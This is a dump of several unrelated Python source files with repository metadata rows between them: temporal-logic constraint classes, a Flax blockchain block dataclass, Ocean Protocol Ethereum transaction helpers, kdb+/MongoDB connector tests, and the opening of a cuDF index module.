return measurement_dictionary[atom_index][0] < measurement_dictionary[atom_index][1]
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
class ValueLengthInConcreteStateGreaterThanTransitionDuration(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint q(x).length() > t.duration() for a concrete state variable q, a program variable x
and a transition duration t.duration().
"""
def __init__(self, value_expression, duration):
self._value_expression = value_expression
self._duration = duration
def __repr__(self):
return f"{self._value_expression} > {self._duration}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._duration == other._duration)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
# construct a list of the lhs and rhs of the time between operator
expressions = [self._value_expression, self._duration]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# the measurements exist, so compare them
return measurement_dictionary[atom_index][0] > measurement_dictionary[atom_index][1]
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
class ValueLengthInConcreteStateEqualsTransitionDuration(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint q(x).length().equals(t.duration()) for a concrete state variable q, a program variable x
and a transition duration t.duration().
"""
def __init__(self, value_expression, duration):
self._value_expression = value_expression
self._duration = duration
def __repr__(self):
return f"{self._value_expression}.equals({self._duration})"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._duration == other._duration)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
# construct a list of the lhs and rhs of the time between operator
expressions = [self._value_expression, self._duration]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# the measurements exist, so compare them
return measurement_dictionary[atom_index][0] == measurement_dictionary[atom_index][1]
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
class ValueInConcreteStateEqualsConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x) == n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression}.equals({self._constant})"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement == self._constant
class ValueInConcreteStateLessThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x) < n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement < self._constant
class ValueInConcreteStateGreaterThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the atomic constraint q(x) > n for a concrete state variable q, a program variable x
and a constant n.
"""
def __init__(self, value_expression, constant):
self._value_expression = value_expression
self._constant = constant
def __repr__(self):
return f"{self._value_expression} > {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._value_expression == other._value_expression
and self._constant == other._constant)
def get_value_expression(self):
return self._value_expression
def get_expression(self, index):
return self.get_value_expression()
"""
Attributes of transitions.
"""
class DurationOfTransition():
"""
Class to represent the result of calling .duration() on a transition.
"""
def __init__(self, transition_expression):
self._transition_expression = transition_expression
def __repr__(self):
return f"{self._transition_expression}.duration()"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression)
def get_transition_expression(self):
return self._transition_expression
def __lt__(self, other):
if type(other) in [int, float]:
return DurationOfTransitionLessThanConstant(self, other)
if type(other) in [int, float]:
return DurationOfTransitionGreaterThanConstant(self, other)
if type(other) is ValueInConcreteState:
return DurationOfTransitionLessThanValueInConcreteState(self, other)
class ConcreteStateBeforeTransition(ConcreteStateExpression):
"""
Class to represent the first concrete state in a transition.
"""
def __init__(self, transition_expression):
self._transition_expression = transition_expression
def __repr__(self):
return f"{self._transition_expression}.before()"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression)
def get_transition_expression(self):
return self._transition_expression
class ConcreteStateAfterTransition(ConcreteStateExpression):
"""
Class to represent the second concrete state in a transition.
"""
def __init__(self, transition_expression):
self._transition_expression = transition_expression
def __repr__(self):
return f"{self._transition_expression}.after()"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression)
def get_transition_expression(self):
return self._transition_expression
"""
Atomic constraints over transitions.
"""
class DurationOfTransitionLessThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the comparison of a transition duration with a constant.
"""
def __init__(self, transition_duration, constant):
self._transition_duration = transition_duration
self._constant = constant
def __repr__(self):
return f"{self._transition_duration} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_duration == other._transition_duration
and self._constant == other._constant)
def get_transition_duration_obj(self):
return self._transition_duration
def get_expression(self, index):
return self.get_transition_duration_obj()
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
measurement = measurement_dictionary[atom_index][subatom_index]
return measurement < self._constant
class DurationOfTransitionLessThanValueInConcreteState(ConstraintBase, MixedAtom):
"""
Class to represent the comparison of a transition duration with a value
given to a program variable by a concrete state.
"""
def __init__(self, transition_duration, value_expression):
self._transition_duration = transition_duration
self._value_expression = value_expression
def __repr__(self):
return f"{self._transition_duration} < {self._value_expression}"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_duration == other._transition_duration
and self._value_expression == other._value_expression)
def get_transition_duration(self):
return self._transition_duration
def get_value_expression(self):
return self._value_expression
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# both values exist, so compare them
return measurement_dictionary[atom_index][0] < measurement_dictionary[atom_index][1]
else:
# None is interpreted as inconclusive
return None
class DurationOfTransitionGreaterThanConstant(ConstraintBase, NormalAtom):
"""
Class to represent the comparison of a transition duration with a constant.
"""
def __init__(self, transition_duration, constant):
self._transition_duration = transition_duration
self._constant = constant
def __repr__(self):
return f"{self._transition_duration} > {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_duration == other._transition_duration
and self._constant == other._constant)
def get_transition_duration_obj(self):
return self._transition_duration
def get_expression(self, index):
return self.get_transition_duration_obj()
"""
Temporal operators.
"""
class NextTransitionFromConcreteState(TransitionExpression):
"""
Class to represent the atomic constraint X.next(P) for a concrete state expression X and a predicate P
identifying transitions.
"""
def __init__(self, concrete_state_expression, predicate):
self._concrete_state_expression = concrete_state_expression
self._predicate = predicate
def __repr__(self):
return f"{self._concrete_state_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression == other._concrete_state_expression
and self._predicate == other._predicate)
def get_concrete_state_expression(self):
return self._concrete_state_expression
def get_predicate(self):
return self._predicate
class NextConcreteStateFromConcreteState(ConcreteStateExpression):
"""
Class to represent the atomic constraint X.next(P) for a concrete state expression X and a predicate P
identifying concrete states.
"""
def __init__(self, concrete_state_expression, predicate):
self._concrete_state_expression = concrete_state_expression
self._predicate = predicate
def __repr__(self):
return f"{self._concrete_state_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression == other._concrete_state_expression
and self._predicate == other._predicate)
def get_concrete_state_expression(self):
return self._concrete_state_expression
def get_predicate(self):
return self._predicate
class NextTransitionFromTransition(TransitionExpression):
"""
Class to represent the atomic constraint X.next(P) for a concrete state expression X and a predicate P
identifying transitions.
"""
def __init__(self, transition_expression, predicate):
self._transition_expression = transition_expression
self._predicate = predicate
def __repr__(self):
return f"{self._transition_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression
and self._predicate == other._predicate)
def get_transition_expression(self):
return self._transition_expression
def get_predicate(self):
return self._predicate
class NextConcreteStateFromTransition(ConcreteStateExpression):
"""
Class to represent the atomic constraint X.next(P) for a concrete state expression X and a predicate P
identifying concrete states.
"""
def __init__(self, transition_expression, predicate):
self._transition_expression = transition_expression
self._predicate = predicate
def __repr__(self):
return f"{self._transition_expression}.next({self._predicate})"
def __eq__(self, other):
return (type(other) is type(self)
and self._transition_expression == other._transition_expression
and self._predicate == other._predicate)
def get_transition_expression(self):
return self._transition_expression
def get_predicate(self):
return self._predicate
"""
Measurement operators.
"""
class TimeBetween():
"""
Class to represent the timeBetween operator.
"""
def __init__(self, concrete_state_expression_1, concrete_state_expression_2):
if (ConcreteStateExpression not in type(concrete_state_expression_1).__bases__
or ConcreteStateExpression not in type(concrete_state_expression_2).__bases__):
raise Exception("timeBetween arguments must be states.")
self._concrete_state_expression_1 = concrete_state_expression_1
self._concrete_state_expression_2 = concrete_state_expression_2
def __repr__(self):
return f"timeBetween({self._concrete_state_expression_1}, {self._concrete_state_expression_2})"
def __eq__(self, other):
return (type(other) is type(self)
and self._concrete_state_expression_1 == other._concrete_state_expression_1
and self._concrete_state_expression_2 == other._concrete_state_expression_2)
def __lt__(self, other):
if type(other) in [int, float]:
return TimeBetweenLessThanConstant(self, other)
def get_lhs_expression(self):
return self._concrete_state_expression_1
def get_rhs_expression(self):
return self._concrete_state_expression_2
class TimeBetweenLessThanConstant(ConstraintBase, MixedAtom):
"""
Class to represent the atomic constraint timeBetween(q, q') < n for some numerical constant n.
"""
def __init__(self, time_between_expression, constant):
self._time_between_expression = time_between_expression
self._constant = constant
self._observed_lhs_value = None
self._observed_rhs_value = None
def __repr__(self):
return f"{self._time_between_expression} < {self._constant}"
def __eq__(self, other):
return (type(other) is type(self)
and self._time_between_expression == other._time_between_expression
and self._constant == other._constant)
def get_time_between_expression(self):
return self._time_between_expression
def get_expression(self, index):
# get the time between object
expressions = self.get_time_between_expression()
# construct a list of the lhs and rhs of the time between operator
expressions = [expressions.get_lhs_expression(), expressions.get_rhs_expression()]
return expressions[index]
def get_lhs_expression(self):
return self.get_expression(0)
def get_rhs_expression(self):
return self.get_expression(1)
def check(self, atom_index, subatom_index, measurement_dictionary):
"""
Given the measurement found at measurement_dictionary[atom_index][subatom_index],
check to see whether the constraint expressed by this atom is satisfied.
"""
# first, check to see if both timestamps for the two subatoms have now been recorded
if measurement_dictionary[atom_index].get(0) and measurement_dictionary[atom_index].get(1):
# the timestamps exist, so take their difference and compare it with self._constant
return abs(measurement_dictionary[atom_index][1] - measurement_dictionary[atom_index][0]) < self._constant
else:
# otherwise, return the atom (this will be returned to the previous level of the formula tree)
return self
| 36.761435
| 133
| 0.679914
|
bc7b9a85b2d135cd2e20ca08de73e01787e1e93d
| 1,822
|
py
|
Python
|
flax/types/unfinished_block.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 174
|
2021-06-16T17:49:22.000Z
|
2022-03-17T03:03:17.000Z
|
flax/types/unfinished_block.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 49
|
2021-06-17T14:10:53.000Z
|
2022-01-31T11:04:21.000Z
|
flax/types/unfinished_block.py
|
ReadyNeutron/shitcoin-blockchain
|
80add4e545ad22a317244f7fd958d118a5a75c5d
|
[
"Apache-2.0"
] | 80
|
2021-06-17T14:23:31.000Z
|
2022-02-24T05:52:47.000Z
|
from dataclasses import dataclass
from typing import List, Optional
from flax.types.blockchain_format.foliage import Foliage, FoliageTransactionBlock, TransactionsInfo
from flax.types.blockchain_format.program import SerializedProgram
from flax.types.blockchain_format.reward_chain_block import RewardChainBlockUnfinished
from flax.types.blockchain_format.vdf import VDFProof
from flax.types.end_of_slot_bundle import EndOfSubSlotBundle
from flax.util.ints import uint32
from flax.util.streamable import Streamable, streamable
@dataclass(frozen=True)
@streamable
class UnfinishedBlock(Streamable):
# Full block, without the final VDFs
finished_sub_slots: List[EndOfSubSlotBundle] # If first sb
reward_chain_block: RewardChainBlockUnfinished # Reward chain trunk data
challenge_chain_sp_proof: Optional[VDFProof] # If not first sp in sub-slot
reward_chain_sp_proof: Optional[VDFProof] # If not first sp in sub-slot
foliage: Foliage # Reward chain foliage data
foliage_transaction_block: Optional[FoliageTransactionBlock] # Reward chain foliage data (tx block)
transactions_info: Optional[TransactionsInfo] # Reward chain foliage data (tx block additional)
transactions_generator: Optional[SerializedProgram] # Program that generates transactions
transactions_generator_ref_list: List[
uint32
] # List of block heights of previous generators referenced in this block
@property
def prev_header_hash(self):
return self.foliage.prev_block_hash
@property
def partial_hash(self):
return self.reward_chain_block.get_hash()
def is_transaction_block(self) -> bool:
return self.foliage.foliage_transaction_block_hash is not None
@property
def total_iters(self):
return self.reward_chain_block.total_iters
| 42.372093
| 104
| 0.791438
|
978bfe491872bcb47a45b6f8ee73fcf16e77b300
| 2,979
|
py
|
Python
|
ocean_lib/web3_internal/transactions.py
|
oceanprotocol/ocean.py
|
0daa7bf22e53a9a13efa2400d16e1991731cfd2c
|
[
"Apache-2.0"
] | 89
|
2020-10-27T08:50:47.000Z
|
2022-03-21T08:42:23.000Z
|
ocean_lib/web3_internal/transactions.py
|
biroedonker/ocean.py
|
68d38cfe6001f07e5102669630c383f5d659a9a8
|
[
"Apache-2.0"
] | 480
|
2020-10-30T07:56:39.000Z
|
2022-03-31T20:01:27.000Z
|
ocean_lib/web3_internal/transactions.py
|
biroedonker/ocean.py
|
68d38cfe6001f07e5102669630c383f5d659a9a8
|
[
"Apache-2.0"
] | 50
|
2020-11-07T15:01:02.000Z
|
2022-03-06T05:49:54.000Z
|
#
# Copyright 2021 Ocean Protocol Foundation
# SPDX-License-Identifier: Apache-2.0
#
from typing import Optional, Union
from enforce_typing import enforce_types
from eth_account.messages import SignableMessage
from ocean_lib.web3_internal.constants import BLOCK_NUMBER_POLL_INTERVAL
from ocean_lib.web3_internal.wallet import Wallet
from ocean_lib.web3_internal.web3_overrides.utils import (
wait_for_transaction_receipt_and_block_confirmations,
)
from web3.datastructures import AttributeDict
from web3.main import Web3
@enforce_types
def sign_hash(msg_hash: SignableMessage, wallet: Wallet) -> str:
"""
This method use `personal_sign`for signing a message. This will always prepend the
`\x19Ethereum Signed Message:\n32` prefix before signing.
:param msg_hash:
:param wallet: Wallet instance
:return: signature
"""
s = wallet.sign(msg_hash)
return s.signature.hex()
@enforce_types
def send_ether(from_wallet: Wallet, to_address: str, amount: int) -> AttributeDict:
if not Web3.isChecksumAddress(to_address):
to_address = Web3.toChecksumAddress(to_address)
web3 = from_wallet.web3
chain_id = web3.eth.chain_id
tx = {
"from": from_wallet.address,
"to": to_address,
"value": amount,
"chainId": chain_id,
}
tx["gas"] = web3.eth.estimate_gas(tx)
raw_tx = from_wallet.sign_tx(tx)
tx_hash = web3.eth.send_raw_transaction(raw_tx)
block_confirmations = from_wallet.block_confirmations.value
block_number_poll_interval = BLOCK_NUMBER_POLL_INTERVAL[chain_id]
transaction_timeout = from_wallet.transaction_timeout.value
wait_for_transaction_receipt_and_block_confirmations(
web3,
tx_hash,
block_confirmations,
block_number_poll_interval,
transaction_timeout,
)
return web3.eth.get_transaction_receipt(tx_hash)
@enforce_types
def cancel_or_replace_transaction(
from_wallet: Wallet,
nonce_value: Optional[Union[str, int]] = None,
gas_price: Optional[int] = None,
gas_limit: Optional[int] = None,
) -> AttributeDict:
web3 = from_wallet.web3
chain_id = web3.eth.chain_id
tx = {
"from": from_wallet.address,
"to": from_wallet.address,
"value": 0,
"chainId": chain_id,
}
gas = gas_limit if gas_limit is not None else web3.eth.estimate_gas(tx)
tx["gas"] = gas + 1
raw_tx = from_wallet.sign_tx(tx, fixed_nonce=nonce_value, gas_price=gas_price)
tx_hash = web3.eth.send_raw_transaction(raw_tx)
block_confirmations = from_wallet.block_confirmations.value
block_number_poll_interval = BLOCK_NUMBER_POLL_INTERVAL[chain_id]
transaction_timeout = from_wallet.transaction_timeout.value
wait_for_transaction_receipt_and_block_confirmations(
web3,
tx_hash,
block_confirmations,
block_number_poll_interval,
transaction_timeout,
)
return web3.eth.get_transaction_receipt(tx_hash)
| 32.736264
| 86
| 0.732796
|
52ea2c63bf9729a6da8b9a2828cb094225e7649f
| 11,786
|
py
|
Python
|
tests/test_kdb.py
|
ghaughian/kdb-doc-manager
|
989e21e9a1be80b1cc991d2dbb453e30ad20db70
|
[
"Apache-2.0"
] | 1
|
2019-05-02T14:40:15.000Z
|
2019-05-02T14:40:15.000Z
|
tests/test_kdb.py
|
ghaughian/kdb-doc-manager
|
989e21e9a1be80b1cc991d2dbb453e30ad20db70
|
[
"Apache-2.0"
] | null | null | null |
tests/test_kdb.py
|
ghaughian/kdb-doc-manager
|
989e21e9a1be80b1cc991d2dbb453e30ad20db70
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test KDB using the synchronizer, i.e. as it would be used by an user
"""
import logging
import os
import sys
import time
from bson import SON
from mongo_connector.compat import u
from mongo_connector.connector import Connector
from mongo_connector.test_utils import ReplicaSet, assert_soon
from mongo_connector.util import retry_until_ok
from qpython import qconnection
from qpython.qtype import QException
sys.path[0:0] = [""]
from mongo_connector.doc_managers.kdb_doc_manager import DocManager
from tests import unittest, kdb_url
class KdbTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.kdb_conn = qconnection.QConnection(host=kdb_url.split(':')[0], port=int(kdb_url.split(':')[1]))
cls.kdb_conn.open()
cls.docman = DocManager(kdb_url, unique_key='id')
def setUp(self):
# Create test database in KDB+
self.kdb_conn.sync("`.test.test set ([]id:(); ts:`long$(); ns:(); name:(); title:(); description:(); subject:(); data:(); a:`int$(); b_0_c:`int$(); b_10_c:`int$(); b_0_e:`int$(); b_1_d:`int$(); b_1_f:`int$(); b_2_e:`int$(); billing_address_street:(); billing_address_state:(); numbers_0:(); numbers_1:(); numbers_2:(); characters_0_name:(); characters_0_color:(); characters_1_name:(); characters_1_color:(); characters_2:(); popularity:`int$());")
def _search(self, query):
return self.docman._stream_search(query)
def _remove(self):
self.kdb_conn.sync("![`.test;();0b;enlist`test];`.test.test set ([]id:(); ts:`long$(); ns:(); name:(); title:(); description:(); subject:(); data:(); a:`int$(); b_0_c:`int$(); b_10_c:`int$(); b_0_e:`int$(); b_1_d:`int$(); b_1_f:`int$(); b_2_e:`int$(); billing_address_street:(); billing_address_state:(); numbers_0:(); numbers_1:(); numbers_2:(); characters_0_name:(); characters_0_color:(); characters_1_name:(); characters_1_color:(); characters_2:(); popularity:`int$());")
class TestKdb(KdbTestCase):
""" Tests Kdb
"""
@classmethod
def setUpClass(cls):
KdbTestCase.setUpClass()
cls.repl_set = ReplicaSet().start()
cls.conn = cls.repl_set.client()
@classmethod
def tearDownClass(cls):
""" Kills cluster instance
"""
cls.repl_set.stop()
def setUp(self):
self._remove()
try:
os.unlink("oplog.timestamp")
except OSError:
pass
open("oplog.timestamp", "w").close()
docman = DocManager(kdb_url, unique_key='id')
self.connector = Connector(
mongo_address=self.repl_set.uri,
ns_set=['test.test'],
doc_managers=(docman,),
)
retry_until_ok(self.conn.test.test.drop)
self._remove()
self.connector.start()
assert_soon(lambda: len(self.connector.shard_set) > 0)
def tearDown(self):
self.connector.join()
def test_insert(self):
"""Tests insert
"""
self.conn['test']['test'].insert_one({'name': 'paulie'})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync('?[.test.test;();0b;()]')) > 0)
result_set_1 = self.kdb_conn.sync('?[.test.test;enlist(~\:;`name;"paulie");0b;()]')
self.assertEqual(len(result_set_1), 1)
result_set_2 = self.conn['test']['test'].find_one()
for item in result_set_1:
doc = {}
for k, v in item.items():
doc[k] = v
self.assertEqual(doc['id'], str(result_set_2['_id']))
self.assertEqual(doc['name'], result_set_2['name'])
def test_remove(self):
"""Tests remove
"""
self.conn['test']['test'].insert_one({'name': 'paulie'})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync("?[.test.test;();0b;()]")) == 1)
self.conn['test']['test'].delete_one({'name': 'paulie'})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync("?[.test.test;();0b;()]")) == 0)
def test_update(self):
"""Test update operations on Kdb.
Need to have the following fields defined in schema.q:
a:`int$(); b_0_c:`int$(); b_10_c:`int$(); b_0_e:`int$();
b_1_d:`int$(); b_1_f:`int$(); b_2_e:`int$()
"""
docman = self.connector.doc_managers[0]
self.conn.test.test.insert_one({"a": 0})
assert_soon(lambda: sum(1 for _ in self._search("()")) == 1)
def check_update(update_spec):
updated = self.conn.test.command(
SON([('findAndModify', 'test'),
('query', {"a": 0}),
('update', update_spec),
('new', True)]))['value']
# Stringify _id to match what will be retrieved from Kdb
updated[u('_id')] = u(updated['_id'])
# Flatten the MongoDB document to match Kdb
updated = docman._clean_doc(updated, 'dummy.namespace', 0)
def update_worked():
replicated = list(self._search("ns:test.test;a=0"))[0]
return replicated == updated
# Allow some time for update to propagate
assert_soon(update_worked)
# Update by adding a field.
# Note that Kdb can't mix types within an array
check_update({"$set": {"b": [{"c": 10}, {"d": 11}]}})
# Update by setting an attribute of a sub-document beyond end of array.
check_update({"$set": {"b.10.c": 42}})
# Update by changing a value within a sub-document (contains array)
check_update({"$inc": {"b.0.c": 1}})
# Update by changing the value within an array
check_update({"$inc": {"b.1.f": 12}})
# Update by adding new bucket to list
check_update({"$push": {"b": {"e": 12}}})
# Update by replacing an entire sub-document
check_update({"$set": {"b.0": {"e": 4}}})
# Update by adding a sub-document
check_update({"$set": {"b": {"0": {"c": 100}}}})
# Update whole document
check_update({"a": 0, "b": {"1": {"d": 10000}}})
def test_rollback(self):
"""Tests rollback. We force a rollback by inserting one doc, killing
primary, adding another doc, killing the new primary, and
restarting both the servers.
"""
primary_conn = self.repl_set.primary.client()
self.conn['test']['test'].insert_one({'name': 'paul'})
assert_soon(
lambda: self.conn.test.test.find({'name': 'paul'}).count() == 1)
assert_soon(
lambda: sum(1 for _ in self.kdb_conn.sync('?[`.test.test;();0b;()]')) == 1)
self.repl_set.primary.stop(destroy=False)
new_primary_conn = self.repl_set.secondary.client()
admin_db = new_primary_conn['admin']
while admin_db.command("isMaster")['ismaster'] is False:
time.sleep(1)
time.sleep(5)
retry_until_ok(self.conn.test.test.insert_one, {'name': 'pauline'})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync('?[`.test.test;();0b;()]')) == 2)
result_set_1 = list(self.kdb_conn.sync('?[`.test.test;enlist(~\:;`name;"pauline");0b;()]'))
result_set_2 = self.conn['test']['test'].find_one({'name': 'pauline'})
self.assertEqual(len(result_set_1), 1)
for item in result_set_1:
self.assertEqual(item['_id'], str(result_set_2['_id']))
self.repl_set.secondary.stop(destroy=False)
self.repl_set.primary.start()
while primary_conn['admin'].command("isMaster")['ismaster'] is False:
time.sleep(1)
self.repl_set.secondary.start()
time.sleep(2)
result_set_1 = self.kdb_conn.sync('?[`.test.test;enlist(~\:;`name;"pauline");0b;()]')
self.assertEqual(sum(1 for _ in result_set_1), 0)
result_set_2 = self.kdb_conn.sync('?[`.test.test;enlist(~\:;`name;"paul");0b;()]')
self.assertEqual(sum(1 for _ in result_set_2), 1)
def test_valid_fields(self):
""" Tests documents with field definitions
"""
inserted_obj = self.conn['test']['test'].insert_one(
{'name': 'test_valid'}).inserted_id
self.conn['test']['test'].update_one(
{'_id': inserted_obj},
{'$set': {'popularity': 1}}
)
docman = self.connector.doc_managers[0]
assert_soon(lambda: sum(1 for _ in self._search("()")) > 0)
result = docman.get_last_doc()
self.assertIn('popularity', result)
self.assertEqual(sum(1 for _ in self._search("name ~\:\"test_valid\"")), 1)
def test_invalid_fields(self):
""" Tests documents without field definitions
"""
inserted_obj = self.conn['test']['test'].insert_one(
{'name': 'test_invalid'}).inserted_id
self.conn['test']['test'].update_one(
{'_id': inserted_obj},
{'$set': {'break_this_test': 1}}
)
docman = self.connector.doc_managers[0]
assert_soon(lambda: sum(1 for _ in self._search("()")) > 0)
result = docman.get_last_doc()
self.assertNotIn('break_this_test', result)
self.assertEqual(sum(1 for _ in self._search(
"name ~\:\"test_invalid\"")), 1)
def test_nested_fields(self):
"""Test indexing fields that are sub-documents in MongoDB
The following fields are defined in the provided schema.q:
billing_address_street:(); billing_address_state:();
numbers_0:(); numbers_1:(): numbers_2:()
characters_0_name:(); characters_0_color:();
characters_1_name:(); characters_1_color:();
characters_2:()
"""
# Connector is already running
self.conn["test"]["test"].insert_one({
"name": "Jeb",
"billing": {
"address": {
"street": "12345 Mariposa Street",
"state": "California"
}
}
})
self.conn["test"]["test"].insert_one({
"numbers": ["one", "two", "three"],
"characters": [
{"name": "Big Bird",
"color": "yellow"},
{"name": "Elmo",
"color": "red"},
"Cookie Monster"
]
})
assert_soon(lambda: sum(1 for _ in self.kdb_conn.sync("?[`.test.test;();0b;()]")) > 0,
"documents should have been replicated to Kdb")
# Search for first document
results = self.kdb_conn.sync("?[`.test.test;enlist(~\:;`billing_address_street;\"12345 Mariposa Street\");0b;()]")
self.assertEqual(len(results), 1)
self.assertEqual(next(iter(results))["billing_address_state"],
"California")
# Search for second document
results = self.kdb_conn.sync("?[`.test.test;enlist(~\:;`characters_1_color;\"red\");0b;()]")
self.assertEqual(len(results), 1)
self.assertEqual(next(iter(results))["numbers.2"], "three")
results = self.kdb_conn.sync("?[`.test.test;enlist(~\:;`characters_2;\"Cookie Monster\");0b;()]")
self.assertEqual(len(results), 1)
if __name__ == '__main__':
unittest.main()
| 38.769737
| 484
| 0.583828
|
8bd91b71a6ad82c010f685fba40d3e4db4a40478
| 23,287
|
py
|
Python
|
python/cudf/cudf/dataframe/index.py
|
okoskinen/cudf
|
289fc3e29ba0c58fada3a3e998bd193bbca47edd
|
[
"Apache-2.0"
] | null | null | null |
python/cudf/cudf/dataframe/index.py
|
okoskinen/cudf
|
289fc3e29ba0c58fada3a3e998bd193bbca47edd
|
[
"Apache-2.0"
] | null | null | null |
python/cudf/cudf/dataframe/index.py
|
okoskinen/cudf
|
289fc3e29ba0c58fada3a3e998bd193bbca47edd
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2018, NVIDIA CORPORATION.
from __future__ import division, print_function
import pickle
from copy import copy, deepcopy
import numpy as np
import pandas as pd
from numba.cuda.cudadrv.devicearray import DeviceNDArray
import nvstrings
from librmm_cffi import librmm as rmm
import cudf
import cudf.bindings.copying as cpp_copying
from cudf.comm.serialize import register_distributed_serializer
from cudf.dataframe import columnops
from cudf.dataframe.buffer import Buffer
from cudf.dataframe.categorical import CategoricalColumn
from cudf.dataframe.column import Column
from cudf.dataframe.datetime import DatetimeColumn
from cudf.dataframe.numerical import NumericalColumn
from cudf.dataframe.string import StringColumn
from cudf.indexing import _IndexLocIndexer
from cudf.utils import cudautils, ioutils, utils
class Index(object):
"""The root interface for all Series indexes.
"""
def serialize(self, serialize):
"""Serialize into pickle format suitable for file storage or network
transmission.
Parameters
---
serialize: A function provided by register_distributed_serializer
middleware.
"""
header = {}
header["payload"], frames = serialize(pickle.dumps(self))
header["frame_count"] = len(frames)
return header, frames
@classmethod
def deserialize(cls, deserialize, header, frames):
"""Convert from pickle format into Index
Parameters
---
deserialize: A function provided by register_distributed_serializer
middleware.
header: The data header produced by the serialize function.
frames: The serialized data
"""
payload = deserialize(
header["payload"], frames[: header["frame_count"]]
)
return pickle.loads(payload)
def take(self, indices):
"""Gather only the specific subset of indices
Parameters
---
indices: An array-like that maps to values contained in this Index.
"""
assert indices.dtype.kind in "iu"
if indices.size == 0:
# Empty indices
return RangeIndex(indices.size)
else:
# Gather
index = cpp_copying.apply_gather_array(self.gpu_values, indices)
col = self.as_column().replace(data=index.data)
new_index = as_index(col)
new_index.name = self.name
return new_index
def argsort(self, ascending=True):
return self.as_column().argsort(ascending=ascending)
@property
def values(self):
return np.asarray([i for i in self.as_column()])
def to_pandas(self):
return pd.Index(self.as_column().to_pandas(), name=self.name)
def to_arrow(self):
return self.as_column().to_arrow()
@ioutils.doc_to_dlpack()
def to_dlpack(self):
"""{docstring}"""
import cudf.io.dlpack as dlpack
